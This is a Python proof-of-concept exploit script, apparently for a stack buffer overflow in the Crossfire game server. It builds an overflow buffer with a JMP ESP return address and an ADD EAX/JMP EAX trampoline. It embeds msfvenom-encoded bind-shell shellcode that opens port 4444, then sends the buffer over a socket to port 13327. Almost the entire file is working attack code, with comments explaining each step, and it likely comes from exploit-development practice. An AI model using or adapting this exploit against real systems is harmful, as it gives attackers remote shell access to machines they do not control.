crossfire-poc.py

#!/usr/bin/python


#nasm > add eax,12
#00000000  83C00C            add eax,byte +0xc
#nasm > jmp eax
#00000000  FFE0              jmp eax
#nasm > 
# 0x08134597: jmp esp

#ret = "\x97\x45\x13\x08"
import socket
host="127.0.0.1"
#crash="\x41" * 4368 + "\x42" * 4 + "C" * 7
# crash = "\x41" * 4368 + "\x42" * 4 + "\x83\xC0\x0C\xFF\xE0" + "\x90\x90"

# Memory address of JMP ESP instruction
ret = "\x97\x45\x13\x08"
# generated by msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b '\x00\x0a\x0d\x20' --platform linux -a x86 -e x86/shikata_ga_nai
# creates a bind shell payload (port listening on victim)

shellcode = ("\xdd\xc1\xba\x23\x27\xcb\xe2\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x14\x31\x56\x19\x83\xc6\x04\x03\x56\x15\xc1\xd2\xfa\x39\xf2"
"\xfe\xae\xfe\xaf\x6a\x53\x88\xae\xdb\x35\x47\xb0\x47\xe4\x05"
"\xd8\x75\x18\xbb\x44\x10\x08\xea\x24\x6d\xc9\x66\xa2\x35\xc7"
"\xf7\xa3\x87\xd3\x44\xb7\xb7\xba\x67\x37\xf4\xf2\x1e\xfa\x7b"
"\x61\x87\x6e\x43\xde\xf5\xee\xf2\xa7\xfd\x86\x2b\x77\x8d\x3e"
"\x5c\xa8\x13\xd7\xf2\x3f\x30\x77\x58\xc9\x56\xc7\x55\x04\x18")

# The x86 opcode instructions says ADD,EAX,12 Bytes (shift offset by 12 bytes), and then JMP EAX
# That lands right into the beginning of the shellcode and the return address is the location of the buffer of A's
crash = shellcode +  "\x41" * (4368-105) + ret + "\x83\xC0\x0C\xFF\xE0" + "\x90\x90"

buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Sending evil buffer..."
s.connect((host, 13327))
s.send(buffer)
data=s.recv(1024)
print data
s.close()
print "[*]Payload Sent !"